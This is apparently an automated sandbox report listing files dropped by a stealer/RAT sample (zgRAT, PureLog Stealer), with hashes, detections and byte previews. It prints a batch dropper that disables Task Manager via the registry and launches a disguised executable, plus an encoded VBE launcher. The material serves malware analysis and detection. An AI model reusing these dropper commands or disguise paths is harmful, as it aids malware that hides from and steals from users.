                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\yrmzpTJyIK

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\yt9V4rph85

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\yycG0dLQ73

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\zEFwID6Emx

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\zFOx26r4uf

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):98304
                                                                                Entropy (8bit):0.08235737944063153
                                                                                Encrypted:false
                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\zaSSX7RXtx

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\zmeSlZGYBe

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vzg................................. ........@.. ........................ ...........@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...............................O........................................0..........(.... ........8........E....9.......)...8...84...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E................j.......>.......8....~....9.... ....~....{....:....& ....8.......... ....8........~....(T...~....(X... ....<@... ....8u...~....(L... .... .... ....s....~....(P....... ....8?...r...ps....z*8.... ....~....{....:

                                                                                C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):213
                                                                                Entropy (8bit):5.333616565455925
                                                                                Encrypted:false
                                                                                SSDEEP:6:q5//3StuH1jhRiI36BROcZDNEpXNh/aIQdfzGBiCL4AB0n:g/TVjhR136ROcOqndL0G60
                                                                                MD5:A29756B59756F0110F008E371F219BA1
                                                                                SHA1:33686DA500C2A1AF6344A5CA50A924523AF18EB5
                                                                                SHA-256:151F21446759FED3BB2CB40DE1CAECBA71A6770140AFA50D3DA46457A247B590
                                                                                SHA-512:06154E108095A2F53FDD3FDB69ABFBF51E9E7613C89F254F3F20D37C3E9006C8868C57B0D3EBACC1A7D434001F4476A8D7A256E9E5F27CD493400948898CDEE6
                                                                                Malicious:false
                                                                                Preview:%jOFZHYfvxJcgX%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%FkwJlrKi%..%APxqDrPiMISErn%"%AppData%\ComProviderDriversavescrt/ComrefNetsvc.exe"%aROAF%

                                                                                C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\a47adf4e1da207

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):188
                                                                                Entropy (8bit):5.6600439596573695
                                                                                Encrypted:false
                                                                                SSDEEP:3:YrvMWdRGzDSJcIX0zdGh7b/0RrctnGfdrS/XamFT8yEw/vlrJgd+ct4ME/3uD2KT:dWTqDSSIX0x4/0NcnGxSfaBu/9dYvTDB
                                                                                MD5:11CC7A05166AE9F014F8229FCC4A43A0
                                                                                SHA1:A1B25EB0232EE394EDAE3E8BBC9CAEF91F419A23
                                                                                SHA-256:FD9229E9D26EC2CD8D157FBD3556125AEAF52B985437531455CD7E2B62FDFDFE
                                                                                SHA-512:DEAB119D6D2BFECFAC1049398F345547B1209B28F62E429F53205F7931CD9C4BAA316474C7CE28BB734290EDB4B3095705F54197D9CCDB90B3AF105F85FAA639
                                                                                Malicious:false
                                                                                Preview:EEgNGikFRiwoxPbY8LY3CbCoMnR7glU8heL9j9zErPDE6ZxwmJ7H6NJmC2AcQnjpNyHTDcz8VTLwX8rw0eVXoNCTVj6r9XyEqY0ISdsKU8vmBWODKNlwRLAAvx8efH97eHG9HjeWvLDqbZR8U2gvvCweX0WefOoM9xH4QP6ktPAGIUjWg9KmkNMcUlmR

                                                                                C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):234
                                                                                Entropy (8bit):5.87016814386512
                                                                                Encrypted:false
                                                                                SSDEEP:6:GhkgwqK+NkLzWbH1rFnBaORbM5nCLEG7uINJa2:GyBMCzWL1hBaORbQCLE6ba2
                                                                                MD5:58D9BC3C577A005201A94186763725EB
                                                                                SHA1:DF8F1DA5E019F66D2AA107515B5FBD9DB863492D
                                                                                SHA-256:41699E402BD653184F8ABBE6D56416DC4E5CF8B51E5809752CC79515A8DC2309
                                                                                SHA-512:F1337EEB89851A3C93B8E3A60F30D96F9E9708960C7BEC6FCF468FD2E892601D61BD15C412BE815B8686FCDC13D77F603B47001A56D0B32978F936AC92A00ED9
                                                                                Malicious:true
                                                                                Preview:#@~^0QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 0!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPrYzw2GlDl]JZKhnMW-k9+.9Mk\../m\+k^.YJzoX};A5_?2..P1.19hy(l*nTR8lDEBPTBP6lVk+5EMAAA==^#~@.

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\38384e6a620884

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):224
                                                                                Entropy (8bit):5.729529829798714
                                                                                Encrypted:false
                                                                                SSDEEP:6:3ft3u6O0SCcku2dCyHwjwOMUSAGco+hs2XYn2jXw9kx:Pt3zO0aCzOM5jas2XYnCX0U
                                                                                MD5:572250148974A47FD94047CFD9199A22
                                                                                SHA1:3BBF001BBF0DA27996DC7D6010254FF61C95FBD9
                                                                                SHA-256:1374CD38B92373EDAC5AAAD7E9CBB42D6DF29D068FB8EE6554F7136D8AD7A7B2
                                                                                SHA-512:69A5010A604E9FE25BC92046017889867CCAA72D0A2006724E5918130091419013E952A45346B4A9BB417D1B481334929EDD6DA5172198DFE41BE0E4BEFB7931
                                                                                Malicious:false
                                                                                Preview:eoanSP4vO22SrHqm1Al6I6TMDDrHIvCWQXTC8neimbvH7brLvAGoErEiVNkOixmd0gCUxonOfCUqKLPlVgVIoXRiSvqvCPAyzSQaZXXHW2IBWXXJ793BbezcOdBB71LPCg125zL8IOvvPPM4YhyDW8XUcyL5VVJfq290gfNIx43MtEN8RHnaDI2DIhaHnQmwFQEWQVY2TqPbFLkYlMoOrtbi96s8FGeh

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vzg................................. ........@.. ........................ ...........@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...............................O........................................0..........(.... ........8........E....9.......)...8...84...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E................j.......>.......8....~....9.... ....~....{....:....& ....8.......... ....8........~....(T...~....(X... ....<@... ....8u...~....(L... .... .... ....s....~....(P....... ....8?...r...ps....z*8.... ....~....{....:

                                                                                C:\Users\user\Desktop\BkJolhdT.log

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):32256
                                                                                Entropy (8bit):5.631194486392901
                                                                                Encrypted:false
                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                Joe Sandbox View:
                                                                                • Filename: ntoskrnl2.exe, Detection: malicious, Browse
                                                                                • Filename: top.exe, Detection: malicious, Browse
                                                                                • Filename: DC86.exe, Detection: malicious, Browse
                                                                                • Filename: WinPerfcommon.exe, Detection: malicious, Browse
                                                                                • Filename: Udzp7lL5ns.exe, Detection: malicious, Browse
                                                                                • Filename: loader.exe, Detection: malicious, Browse
                                                                                • Filename: hz7DzW2Yop.exe, Detection: malicious, Browse
                                                                                • Filename: 7aHY4r6vXR.exe, Detection: malicious, Browse
                                                                                • Filename: 0V2JsCrGUB.exe, Detection: malicious, Browse
                                                                                • Filename: FYKrlfQrxb.exe, Detection: malicious, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\DBQFDgRN.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):33792
                                                                                Entropy (8bit):5.541771649974822
                                                                                Encrypted:false
                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\DjKnpLXK.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):32256
                                                                                Entropy (8bit):5.631194486392901
                                                                                Encrypted:false
                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\FpiFczmJ.log

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):33792
                                                                                Entropy (8bit):5.541771649974822
                                                                                Encrypted:false
                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\PVPluWhn.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):36352
                                                                                Entropy (8bit):5.668291349855899
                                                                                Encrypted:false
                                                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\REWLTGNk.log

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):36352
                                                                                Entropy (8bit):5.668291349855899
                                                                                Encrypted:false
                                                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\YBKLwVHY.log

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):46592
                                                                                Entropy (8bit):5.870612048031897
                                                                                Encrypted:false
                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                Malicious:true
                                                                                Antivirus:
